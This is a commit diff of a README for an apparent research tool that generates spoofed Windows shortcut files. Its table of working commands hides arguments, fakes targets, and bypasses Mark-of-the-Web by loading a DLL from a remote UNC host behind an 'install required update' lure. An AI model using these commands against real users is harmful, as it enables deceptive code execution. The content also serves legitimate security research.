Fix screenshot

This commit is contained in:
Wietze
2026-03-07 15:43:59 +00:00
parent c1272ecd60
commit ce531acab7
2 changed files with 1 additions and 1 deletions

Before

Width:  |  Height:  |  Size: 111 KiB

After

Width:  |  Height:  |  Size: 111 KiB

+1 -1
View File
@@ -20,7 +20,7 @@ Read more about this tool in the blog post [_Trust Me, I'm A Shortcut_](https://
| `CVE20259491`<br>🟢 Arguments invisible<br>🔴 Shows real target EXE<br>🔴 Detected by Windows Defender | <img src="/docs/CVE20259491.jpg" alt="Screenshot" width="250" /> | `python3 -m lnk-generator.generate --target-executable "%COMSPEC%" --target-command-line "/c calc.exe" CVE20259491` |
| `SPOOFEXE_OVERFLOWARGS_DISABLETARGET`<br>🟢 Spoofed target EXE<br>🟢 Arguments invisible<br>🔴 Requires Win 11 23H2 or earlier, requires double double-clicking to open<br>🔵 Target field disabled<br>🔵 Updates to true path after opening| <img src="/docs/SPOOFEXE_OVERFLOWARGS_DISABLETARGET.jpg" alt="Screenshot" width="250" /> | `python3 -m lnk-generator.generate --fake-path "C:\README.txt" --target-executable "c:\windows\system32\cmd.exe" --target-command-line "/c ping 127.0.0.1" --icon "%WINDIR%\System32\imageres.dll" --icon-index=97 SPOOFEXE_OVERFLOWARGS_DISABLETARGET` |
| `SPOOFEXE_HIDEARGS_DISABLETARGET`<br>🟢 Spoofed target EXE<br>🟢 Arguments invisible<br>🔵 Target field disabled<br>🔵 Updates to true path after opening | <img src="/docs/SPOOFEXE_HIDEARGS_DISABLETARGET.jpg" alt="Screenshot" width="250" /> | `python3 -m lnk-generator.generate --fake-path "F:\USB Drive" --target-executable "%WINDIR%\System32\WindowsPowershell\v1.0\powershell.exe" --target-command-line "/ec ZQBjAGgAbwAgACIASABpACAAZgByAG8AbQAgAEAAVwBpAGUAdAB6AGUAIgA7ACAAcgBlAGEAZAAtAGgAbwBzAHQA" --icon "%WINDIR%\System32\shell32.dll" --icon-index=7 SPOOFEXE_HIDEARGS_DISABLETARGET` |
| `SPOOFEXE_RUNDLL_DISABLETARGET`<br>🟢 Spoofed target EXE<br>🟢 Bypasses MotW on systems without [CVE-2026-21513](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-21513)<br>🔵 Executes DLLs only (either remote or local)<br>🔵 Target field disabled<br>🔴 Executes DLL via [RunDLL32 with shell32.dll](https://lolbas-project.github.io/lolbas/Libraries/Shell32/), which is easily detectable | <img src="/docs/SPOOFEXE_RUNDL.jpg" alt="Screenshot" width="250" /> | `python3 -m lnk-generator.generate --target-executable "\\\\123.45.67.89\calc.dll" --fake-path "Please open to install required update" --icon "%windir%\system32\imageres.dll" --icon-index 102 SPOOFEXE_RUNDLL_DISABLETARGET` |
| `SPOOFEXE_RUNDLL_DISABLETARGET`<br>🟢 Spoofed target EXE<br>🟢 Bypasses MotW on systems without [CVE-2026-21513](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-21513)<br>🔵 Executes DLLs only (either remote or local)<br>🔵 Target field disabled<br>🔴 Executes DLL via [RunDLL32 with shell32.dll](https://lolbas-project.github.io/lolbas/Libraries/Shell32/), which is easily detectable | <img src="/docs/SPOOFEXE_RUNDLL_DISABLETARGET.jpg" alt="Screenshot" width="250" /> | `python3 -m lnk-generator.generate --target-executable "\\\\123.45.67.89\calc.dll" --fake-path "Please open to install required update" --icon "%windir%\system32\imageres.dll" --icon-index 102 SPOOFEXE_RUNDLL_DISABLETARGET` |
## Usage